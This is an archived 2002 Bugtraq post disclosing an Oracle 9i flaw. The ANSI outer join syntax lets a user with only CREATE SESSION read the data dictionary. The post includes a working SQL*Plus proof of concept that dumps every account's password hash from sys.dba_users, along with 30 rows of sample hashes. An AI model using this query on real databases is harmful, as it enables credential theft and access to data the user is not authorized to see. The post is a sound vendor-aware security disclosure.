[25079] in bugtraq
ansi outer join syntax in Oracle allows access to any data
daemon@ATHENA.MIT.EDU (Pete Finnigan)
Tue Apr 16 18:53:45 2002
Message-ID: <TbVBupB9IEv8EwzY@peterfinnigan.demon.co.uk>
Date: Tue, 16 Apr 2002 16:24:45 +0100
To: BUGTRAQ@securityfocus.com
From: Pete Finnigan <pete@peterfinnigan.demon.co.uk>
MIME-Version: 1.0
Hi all
I thought this list may be interested in this issue, apologies if its
known here already.
Oracle 9i includes the new ANSI outer join syntax. Oracle still supports
the old syntax but in the new syntax there is a serious security issue
that allows any user to view any data.
here is an example:
SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2
(c) Copyright 2001 Oracle Corporation. All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.
SQL> Grant Create Session to us1;
Grant succeeded.
SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;
USERNAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
SYSTEM D4DF7931AB130E37
DBSNMP E066D214D5421CCC
AURORA$JIS$UTILITY$ INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED INVALID_ENCRYPTED_PASSWORD
SCOTT F894844C34402B67
US1 491AB9AB94D8A9EF
OUTLN 4A3BA55E08595C81
ORDSYS 7EFA02EC7EA6B86F
OLAPSVR AF52CFD036E8F425
USERNAME PASSWORD
------------------------------ ------------------------------
OLAPSYS 3FB8EF9DB538647C
ORDPLUGINS 88A2B2C183431F00
MDSYS 72979A94BAD2AF80
CTXSYS 71E687F036AD56E5
WKSYS 69ED49EE1851900D
OLAPDBA 1AF71599EDACFB00
QS_CBADM 7C632AFB71F8D305
QS_ADM 991CDDAD5C5C32CA
QS 8B09C6075BDF2DC4
QS_WS 24ACF617DD7D8F2F
HR 6399F3B38EDF3288
USERNAME PASSWORD
------------------------------ ------------------------------
OE 9C30855E7E0CB02D
PM 72E382A52E89575A
SH 9793B3777CD3BD1A
QS_ES E6A6FA4BB042E3C2
QS_OS FF09F3EB14AE5C26
RMAN E7B5D92911C831E1
QS_CB CF9CFACF5AE24964
QS_CS 91A00922D8C0F146
30 rows selected.
SQL>
This shows that a user with the barest of privileges, i.e. CREATE
SESSION can actually see data in the data dictionary that should not be
seen. In this example we can select the list of usernames and their
hashes.
I wanted to bring this issue to the security community as its doing the
rounds on the oracle server newsgroup. Oracle are already aware of this
as there is a bug to cover it number 2121935. Its marked as fixed in 9.2
and will not be back ported to earlier versions of Oracle. I could not
find this on the oracle security alerts site or on the bug traq database
so here it is.
Best regards
Pete Finnigan
www.pentest-limited.com
--
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager at admin@pentest-limited.com
--
Pete Finnigan
IT Security Consultant
PenTest Limited
Office 01565 830 990
Fax 01565 830 889
Mobile 07974 087 885
pete.finnigan@pentest-limited.com
www.pentest-limited.com
